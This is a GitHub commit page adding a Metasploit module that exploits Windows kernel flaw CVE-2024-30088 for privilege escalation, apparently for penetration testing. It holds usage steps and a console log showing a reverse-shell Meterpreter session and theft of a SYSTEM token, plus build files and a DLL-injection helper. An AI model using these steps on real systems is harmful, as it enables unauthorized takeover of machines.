-
Notifications
You must be signed in to change notification settings - Fork 14.1k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #19345, Post module Windows LPE CVE-2024-30088
- Loading branch information
Showing
12 changed files
with
817 additions
and
1 deletion.
There are no files selected for viewing
Binary file not shown.
56 changes: 56 additions & 0 deletions
56
documentation/modules/exploit/windows/local/cve_2024_30088_authz_basep.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,56 @@ | ||
## Vulnerable Application | ||
CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10, | ||
Windows 11 and Windows Server 2022. | ||
|
||
The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when | ||
the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the | ||
kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure | ||
directly to the user supplied pointed. It then calls `RtlCopyUnicodeString` and | ||
`AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading | ||
to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function. | ||
|
||
### Setup | ||
|
||
Windows 10 22H2 versions without the patch (before 10.0.19045.4529) are vulnerable out of the box. | ||
This exploit module has been tested on Windows 10 version 22H2 build 19045.2965. | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
1. Get a user level session on an affected Windows machine | ||
1. Do: `use windows/local/cve_2024_30038_authz_basep` | ||
1. Set the `LHOST`, `LPORT`, and `SESSION` options | ||
1. Run the module | ||
1. Receive a session running in the context of the `NT AUTHORITY\SYSTEM` user. | ||
|
||
## Scenarios | ||
### Windows 10 (10.0 Build 19045.2965) | ||
``` | ||
msf6 > use windows/local/cve_2024_30038_authz_basep | ||
[*] Using configured payload windows/x64/meterpreter/reverse_tcp | ||
msf6 exploit(windows/local/cve_2024_30038_authz_basep) > set session -1 | ||
session => -1 | ||
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit | ||
[*] Started reverse TCP handler on 172.16.199.1:5555 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045 | ||
[*] Reflectively injecting the DLL into 696... | ||
[+] The exploit was successful, reading SYSTEM token from memory... | ||
[+] Successfully stole winlogon handle: 3432 | ||
[+] Successfully retrieved winlogon pid: 452 | ||
[*] Sending stage (201798 bytes) to 172.16.199.208 | ||
[*] Meterpreter session 18 opened (172.16.199.1:5555 -> 172.16.199.208:52890) at 2024-08-30 12:45:49 -0700 | ||
meterpreter > getuid | ||
Server username: NT AUTHORITY\SYSTEM | ||
meterpreter > sysinfo | ||
Computer : DESKTOP-FGNRA7E | ||
OS : Windows 10 (10.0 Build 19045). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 2 | ||
Meterpreter : x64/windows | ||
meterpreter > | ||
``` |
31 changes: 31 additions & 0 deletions
31
external/source/exploits/CVE-2024-30088/CVE-2024-30088/CVE-2024-30088.sln
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
|
||
Microsoft Visual Studio Solution File, Format Version 12.00 | ||
# Visual Studio Version 17 | ||
VisualStudioVersion = 17.9.34728.123 | ||
MinimumVisualStudioVersion = 10.0.40219.1 | ||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2024-30088", "CVE-2024-30088.vcxproj", "{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}" | ||
EndProject | ||
Global | ||
GlobalSection(SolutionConfigurationPlatforms) = preSolution | ||
Debug|x64 = Debug|x64 | ||
Debug|x86 = Debug|x86 | ||
Release|x64 = Release|x64 | ||
Release|x86 = Release|x86 | ||
EndGlobalSection | ||
GlobalSection(ProjectConfigurationPlatforms) = postSolution | ||
{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Debug|x64.ActiveCfg = Debug|x64 | ||
{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Debug|x64.Build.0 = Debug|x64 | ||
{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Debug|x86.ActiveCfg = Debug|Win32 | ||
{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Debug|x86.Build.0 = Debug|Win32 | ||
{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Release|x64.ActiveCfg = Release|x64 | ||
{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Release|x64.Build.0 = Release|x64 | ||
{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Release|x86.ActiveCfg = Release|Win32 | ||
{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Release|x86.Build.0 = Release|Win32 | ||
EndGlobalSection | ||
GlobalSection(SolutionProperties) = preSolution | ||
HideSolutionNode = FALSE | ||
EndGlobalSection | ||
GlobalSection(ExtensibilityGlobals) = postSolution | ||
SolutionGuid = {E06D4ED0-8938-4E66-8429-9C6EC7B18D4D} | ||
EndGlobalSection | ||
EndGlobal |
235 changes: 235 additions & 0 deletions
235
external/source/exploits/CVE-2024-30088/CVE-2024-30088/CVE-2024-30088.vcxproj
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,235 @@ | ||
<?xml version="1.0" encoding="utf-8"?> | ||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | ||
<ItemGroup Label="ProjectConfigurations"> | ||
<ProjectConfiguration Include="Debug|Win32"> | ||
<Configuration>Debug</Configuration> | ||
<Platform>Win32</Platform> | ||
</ProjectConfiguration> | ||
<ProjectConfiguration Include="Release|Win32"> | ||
<Configuration>Release</Configuration> | ||
<Platform>Win32</Platform> | ||
</ProjectConfiguration> | ||
<ProjectConfiguration Include="Debug|x64"> | ||
<Configuration>Debug</Configuration> | ||
<Platform>x64</Platform> | ||
</ProjectConfiguration> | ||
<ProjectConfiguration Include="Release|x64"> | ||
<Configuration>Release</Configuration> | ||
<Platform>x64</Platform> | ||
</ProjectConfiguration> | ||
</ItemGroup> | ||
<PropertyGroup Label="Globals"> | ||
<VCProjectVersion>16.0</VCProjectVersion> | ||
<ProjectGuid>{160b76bb-cc55-4229-9c3b-5ebd0ffed32c}</ProjectGuid> | ||
<Keyword>Win32Proj</Keyword> | ||
<RootNamespace>CVE_2024_30088</RootNamespace> | ||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion> | ||
</PropertyGroup> | ||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> | ||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> | ||
<ConfigurationType>DynamicLibrary</ConfigurationType> | ||
<UseDebugLibraries>true</UseDebugLibraries> | ||
<PlatformToolset>v142</PlatformToolset> | ||
<CharacterSet>MultiByte</CharacterSet> | ||
</PropertyGroup> | ||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> | ||
<ConfigurationType>DynamicLibrary</ConfigurationType> | ||
<UseDebugLibraries>false</UseDebugLibraries> | ||
<PlatformToolset>v142</PlatformToolset> | ||
<WholeProgramOptimization>false</WholeProgramOptimization> | ||
<CharacterSet>MultiByte</CharacterSet> | ||
</PropertyGroup> | ||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> | ||
<ConfigurationType>DynamicLibrary</ConfigurationType> | ||
<UseDebugLibraries>true</UseDebugLibraries> | ||
<PlatformToolset>v142</PlatformToolset> | ||
<CharacterSet>MultiByte</CharacterSet> | ||
</PropertyGroup> | ||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> | ||
<ConfigurationType>DynamicLibrary</ConfigurationType> | ||
<UseDebugLibraries>false</UseDebugLibraries> | ||
<PlatformToolset>v142</PlatformToolset> | ||
<WholeProgramOptimization>false</WholeProgramOptimization> | ||
<CharacterSet>MultiByte</CharacterSet> | ||
</PropertyGroup> | ||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> | ||
<ImportGroup Label="ExtensionSettings"> | ||
</ImportGroup> | ||
<ImportGroup Label="Shared"> | ||
</ImportGroup> | ||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> | ||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> | ||
</ImportGroup> | ||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> | ||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> | ||
</ImportGroup> | ||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> | ||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> | ||
</ImportGroup> | ||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> | ||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> | ||
</ImportGroup> | ||
<PropertyGroup Label="UserMacros" /> | ||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> | ||
<LinkIncremental>true</LinkIncremental> | ||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir> | ||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir> | ||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName> | ||
</PropertyGroup> | ||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> | ||
<LinkIncremental>true</LinkIncremental> | ||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir> | ||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir> | ||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName> | ||
</PropertyGroup> | ||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> | ||
<LinkIncremental>false</LinkIncremental> | ||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir> | ||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir> | ||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName> | ||
<GenerateManifest>false</GenerateManifest> | ||
</PropertyGroup> | ||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> | ||
<LinkIncremental>false</LinkIncremental> | ||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir> | ||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir> | ||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName> | ||
<GenerateManifest>false</GenerateManifest> | ||
</PropertyGroup> | ||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> | ||
<ClCompile> | ||
<PrecompiledHeader>NotUsing</PrecompiledHeader> | ||
<WarningLevel>Level3</WarningLevel> | ||
<SDLCheck>true</SDLCheck> | ||
<PreprocessorDefinitions>WIN32;_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions> | ||
<ConformanceMode>false</ConformanceMode> | ||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile> | ||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> | ||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat> | ||
<TreatWarningAsError>true</TreatWarningAsError> | ||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> | ||
<StringPooling>true</StringPooling> | ||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> | ||
<FunctionLevelLinking>false</FunctionLevelLinking> | ||
</ClCompile> | ||
<Link> | ||
<SubSystem>Windows</SubSystem> | ||
<GenerateDebugInformation>true</GenerateDebugInformation> | ||
<EnableUAC>false</EnableUAC> | ||
<GenerateMapFile>true</GenerateMapFile> | ||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile> | ||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName> | ||
<RandomizedBaseAddress>false</RandomizedBaseAddress> | ||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary> | ||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> | ||
</Link> | ||
</ItemDefinitionGroup> | ||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> | ||
<ClCompile> | ||
<PrecompiledHeader>NotUsing</PrecompiledHeader> | ||
<WarningLevel>Level3</WarningLevel> | ||
<SDLCheck>true</SDLCheck> | ||
<PreprocessorDefinitions>_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions> | ||
<ConformanceMode>false</ConformanceMode> | ||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile> | ||
<AdditionalIncludeDirectories>C:\Users\msfuser\Documents\git\metasploit-framework\external\source\include\windows;..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> | ||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat> | ||
<TreatWarningAsError>false</TreatWarningAsError> | ||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> | ||
<StringPooling>true</StringPooling> | ||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> | ||
<FunctionLevelLinking>false</FunctionLevelLinking> | ||
</ClCompile> | ||
<Link> | ||
<SubSystem>Windows</SubSystem> | ||
<GenerateDebugInformation>true</GenerateDebugInformation> | ||
<EnableUAC>false</EnableUAC> | ||
<GenerateMapFile>true</GenerateMapFile> | ||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile> | ||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName> | ||
<RandomizedBaseAddress>false</RandomizedBaseAddress> | ||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary> | ||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> | ||
</Link> | ||
</ItemDefinitionGroup> | ||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> | ||
<ClCompile> | ||
<PrecompiledHeader>NotUsing</PrecompiledHeader> | ||
<WarningLevel>Level3</WarningLevel> | ||
<FunctionLevelLinking>false</FunctionLevelLinking> | ||
<IntrinsicFunctions>false</IntrinsicFunctions> | ||
<SDLCheck> | ||
</SDLCheck> | ||
<PreprocessorDefinitions>WIN32;NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions> | ||
<ConformanceMode>false</ConformanceMode> | ||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile> | ||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> | ||
<TreatWarningAsError>true</TreatWarningAsError> | ||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> | ||
<StringPooling>true</StringPooling> | ||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> | ||
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation> | ||
<ObjectFileName>$(OutDir)\</ObjectFileName> | ||
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName> | ||
</ClCompile> | ||
<Link> | ||
<SubSystem>Windows</SubSystem> | ||
<EnableCOMDATFolding>true</EnableCOMDATFolding> | ||
<OptimizeReferences>true</OptimizeReferences> | ||
<GenerateDebugInformation>false</GenerateDebugInformation> | ||
<EnableUAC>false</EnableUAC> | ||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> | ||
<GenerateMapFile>false</GenerateMapFile> | ||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName> | ||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile> | ||
<RandomizedBaseAddress>false</RandomizedBaseAddress> | ||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary> | ||
</Link> | ||
</ItemDefinitionGroup> | ||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> | ||
<ClCompile> | ||
<PrecompiledHeader>NotUsing</PrecompiledHeader> | ||
<WarningLevel>Level3</WarningLevel> | ||
<FunctionLevelLinking>false</FunctionLevelLinking> | ||
<IntrinsicFunctions>false</IntrinsicFunctions> | ||
<SDLCheck> | ||
</SDLCheck> | ||
<PreprocessorDefinitions>NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions> | ||
<ConformanceMode>false</ConformanceMode> | ||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile> | ||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> | ||
<TreatWarningAsError>true</TreatWarningAsError> | ||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> | ||
<StringPooling>true</StringPooling> | ||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> | ||
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation> | ||
<ObjectFileName>$(OutDir)\</ObjectFileName> | ||
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName> | ||
</ClCompile> | ||
<Link> | ||
<SubSystem>Windows</SubSystem> | ||
<EnableCOMDATFolding>true</EnableCOMDATFolding> | ||
<OptimizeReferences>true</OptimizeReferences> | ||
<GenerateDebugInformation>false</GenerateDebugInformation> | ||
<EnableUAC>false</EnableUAC> | ||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> | ||
<GenerateMapFile>false</GenerateMapFile> | ||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName> | ||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile> | ||
<RandomizedBaseAddress>false</RandomizedBaseAddress> | ||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary> | ||
</Link> | ||
</ItemDefinitionGroup> | ||
<ItemGroup> | ||
<ClCompile Include="dllmain.c" /> | ||
<ClCompile Include="exploit.c" /> | ||
<ClCompile Include="ReflectiveFreeAndExitThread.c" /> | ||
</ItemGroup> | ||
<ItemGroup> | ||
<ClInclude Include="exploit.h" /> | ||
<ClInclude Include="ReflectiveFreeAndExitThread.h" /> | ||
</ItemGroup> | ||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> | ||
<ImportGroup Label="ExtensionTargets"> | ||
</ImportGroup> | ||
</Project> |
48 changes: 48 additions & 0 deletions
48
external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
#include "ReflectiveFreeAndExitThread.h" | ||
|
||
typedef NTSTATUS | ||
(*NtQueueApcThread)( | ||
HANDLE ThreadHandle, | ||
PVOID ApcRoutine, | ||
ULONG_PTR SystemArgument1, | ||
ULONG_PTR SystemArgument2, | ||
ULONG_PTR SystemArgument3 | ||
); | ||
|
||
VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode) { | ||
NtQueueApcThread pNtQueueApcThread = (NtQueueApcThread)GetProcAddress(GetModuleHandle(TEXT("ntdll")), "NtQueueApcThread"); | ||
HANDLE hThread = NULL; | ||
HANDLE hThisThread = NULL; | ||
|
||
do { | ||
if (!pNtQueueApcThread) | ||
break; | ||
|
||
// create a suspended thread that will just exit once the APCs have executed | ||
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExitThread, 0, CREATE_SUSPENDED, NULL); | ||
if (!hThread) | ||
break; | ||
|
||
// open a real handle to this thread to pass in the APC so it operates on this thread and not itself | ||
hThisThread = OpenThread(THREAD_QUERY_INFORMATION | SYNCHRONIZE, FALSE, GetCurrentThreadId()); | ||
if (!hThisThread) | ||
break; | ||
|
||
// tell that thread to wait on this thread, ensures VirtualFree isn't called until this thread has exited | ||
pNtQueueApcThread(hThread, WaitForSingleObjectEx, (ULONG_PTR)hThisThread, INFINITE, FALSE); | ||
|
||
// then close the handle so it's not leaked | ||
QueueUserAPC((PAPCFUNC)CloseHandle, hThread, (ULONG_PTR)hThisThread); | ||
|
||
// then free the memory | ||
pNtQueueApcThread(hThread, VirtualFree, (ULONG_PTR)hAppInstance, 0, MEM_RELEASE); | ||
|
||
ResumeThread(hThread); | ||
} while (FALSE); | ||
|
||
if (hThread) | ||
CloseHandle(hThread); | ||
|
||
ExitThread(dwExitCode); | ||
return; | ||
} |
8 changes: 8 additions & 0 deletions
8
external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.h
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
#ifndef _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H | ||
#define _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H | ||
|
||
#include <windows.h> | ||
|
||
VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode); | ||
|
||
#endif |
Oops, something went wrong.